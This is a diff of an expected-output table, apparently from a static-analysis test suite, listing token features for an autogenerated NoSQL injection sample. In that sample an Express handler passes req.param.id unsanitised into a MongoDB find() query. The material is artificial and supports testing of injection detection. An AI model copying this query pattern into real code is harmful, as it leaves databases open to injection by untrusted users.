autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:9:38:36 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:9:38:36 | query = ... am.id } | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:9:38:36 | query = ... am.id } | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:9:38:36 | query = ... am.id } | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:9:38:36 | query = ... am.id } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:9:38:36 | query = ... am.id } | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:17:38:36 | { id: req.param.id } | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:17:38:36 | { id: req.param.id } | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:17:38:36 | { id: req.param.id } | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:17:38:36 | { id: req.param.id } | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:17:38:36 | { id: req.param.id } | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:19:38:20 | id | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:19:38:20 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:19:38:20 | id | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:19:38:20 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:19:38:20 | id | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:19:38:34 | id: req.param.id | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:19:38:34 | id: req.param.id | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:19:38:34 | id: req.param.id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:19:38:34 | id: req.param.id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:19:38:34 | id: req.param.id | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:19:38:34 | id: req.param.id | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:19:38:34 | id: req.param.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:19:38:34 | id: req.param.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:19:38:34 | id: req.param.id | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:19:38:34 | id: req.param.id | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:23:38:25 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:23:38:25 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:23:38:25 | req | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:23:38:25 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:23:38:25 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:23:38:31 | req.param | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:23:38:31 | req.param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:23:38:31 | req.param | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:23:38:31 | req.param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:23:38:31 | req.param | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:23:38:34 | req.param.id | assignedToPropName | id | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:23:38:34 | req.param.id | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:23:38:34 | req.param.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:23:38:34 | req.param.id | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:23:38:34 | req.param.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:23:38:34 | req.param.id | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:27:38:31 | param | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:27:38:31 | param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:27:38:31 | param | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:27:38:31 | param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:27:38:31 | param | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:33:38:34 | id | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:33:38:34 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:33:38:34 | id | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:33:38:34 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:38:33:38:34 | id | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:5:39:15 | MongoClient | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:5:39:15 | MongoClient | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:5:39:15 | MongoClient | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:5:39:15 | MongoClient | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:5:39:15 | MongoClient | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:5:39:23 | MongoClient.connect | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:5:39:23 | MongoClient.connect | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:5:39:23 | MongoClient.connect | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:5:39:23 | MongoClient.connect | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:5:39:23 | MongoClient.connect | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:5:44:6 | MongoCl ... \\n }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:5:44:6 | MongoCl ... \\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:5:44:6 | MongoCl ... \\n }) | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:5:44:6 | MongoCl ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:5:44:6 | MongoCl ... \\n }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:5:44:6 | exceptional return of MongoCl ... \\n }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:5:44:6 | exceptional return of MongoCl ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:5:44:6 | exceptional return of MongoCl ... \\n }) | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:5:44:6 | exceptional return of MongoCl ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:5:44:6 | exceptional return of MongoCl ... \\n }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:17:39:23 | connect | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:17:39:23 | connect | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:17:39:23 | connect | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:17:39:23 | connect | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:17:39:23 | connect | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:25:39:56 | 'mongod ... 7/test' | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:25:39:56 | 'mongod ... 7/test' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:25:39:56 | 'mongod ... 7/test' | calleeImports | mongodb | @@ -1636,6 +8762,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:25:39:56 | 'mongod ... 7/test' | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:25:39:56 | 'mongod ... 7/test' | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:25:39:56 | 'mongod ... 7/test' | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:39:58 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:39:58 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:39:58 | query | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:39:58 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:39:58 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:44:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:44:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:44:5 | 'arguments' object of anonymous function | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:44:5 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:44:5 | 'arguments' object of anonymous function | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:44:5 | (err, d ... ;\\n } | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:44:5 | (err, d ... ;\\n } | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:44:5 | (err, d ... ;\\n } | calleeImports | mongodb | @@ -1645,6 +8781,71 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:44:5 | (err, d ... ;\\n } | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:44:5 | (err, d ... ;\\n } | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:44:5 | (err, d ... ;\\n } | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:44:5 | exceptional return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:44:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:44:5 | exceptional return of anonymous function | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:44:5 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:44:5 | exceptional return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:44:5 | return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:44:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:44:5 | return of anonymous function | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:44:5 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:59:44:5 | return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:60:39:62 | err | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:60:39:62 | err | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:60:39:62 | err | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:60:39:62 | err | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:60:39:62 | err | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:65:39:66 | db | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:65:39:66 | db | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:65:39:66 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:65:39:66 | db | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:65:39:66 | db | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:65:39:66 | db | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:65:39:66 | db | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:65:39:66 | db | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:65:39:66 | db | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:39:65:39:66 | db | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:11:40:13 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:11:40:13 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:11:40:13 | doc | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:11:40:13 | doc | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:11:40:13 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:11:40:36 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:11:40:36 | doc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:11:40:36 | doc | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:11:40:36 | doc | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:11:40:36 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:11:40:36 | doc = d ... ('doc') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:11:40:36 | doc = d ... ('doc') | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:11:40:36 | doc = d ... ('doc') | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:11:40:36 | doc = d ... ('doc') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:11:40:36 | doc = d ... ('doc') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:17:40:18 | db | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:17:40:18 | db | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:17:40:18 | db | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:17:40:18 | db | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:17:40:18 | db | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:17:40:29 | db.collection | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:17:40:29 | db.collection | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:17:40:29 | db.collection | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:17:40:29 | db.collection | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:17:40:29 | db.collection | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:17:40:36 | db.collection('doc') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:17:40:36 | db.collection('doc') | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:17:40:36 | db.collection('doc') | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:17:40:36 | db.collection('doc') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:17:40:36 | db.collection('doc') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:17:40:36 | exceptional return of db.collection('doc') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:17:40:36 | exceptional return of db.collection('doc') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:17:40:36 | exceptional return of db.collection('doc') | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:17:40:36 | exceptional return of db.collection('doc') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:17:40:36 | exceptional return of db.collection('doc') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:20:40:29 | collection | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:20:40:29 | collection | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:20:40:29 | collection | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:20:40:29 | collection | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:20:40:29 | collection | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:31:40:35 | 'doc' | CalleeFlexibleAccessPath | db.collection | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:31:40:35 | 'doc' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:31:40:35 | 'doc' | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1653,6 +8854,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:31:40:35 | 'doc' | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:31:40:35 | 'doc' | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:40:31:40:35 | 'doc' | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:7:43:9 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:7:43:9 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:7:43:9 | doc | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:7:43:9 | doc | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:7:43:9 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:7:43:14 | doc.find | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:7:43:14 | doc.find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:7:43:14 | doc.find | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:7:43:14 | doc.find | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:7:43:14 | doc.find | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:7:43:21 | doc.find(query) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:7:43:21 | doc.find(query) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:7:43:21 | doc.find(query) | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:7:43:21 | doc.find(query) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:7:43:21 | doc.find(query) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:7:43:21 | exceptional return of doc.find(query) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:7:43:21 | exceptional return of doc.find(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:7:43:21 | exceptional return of doc.find(query) | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:7:43:21 | exceptional return of doc.find(query) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:7:43:21 | exceptional return of doc.find(query) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:11:43:14 | find | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:11:43:14 | find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:11:43:14 | find | enclosingFunctionBody | req res query id req param id MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:11:43:14 | find | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:11:43:14 | find | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:16:43:20 | query | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:16:43:20 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:16:43:20 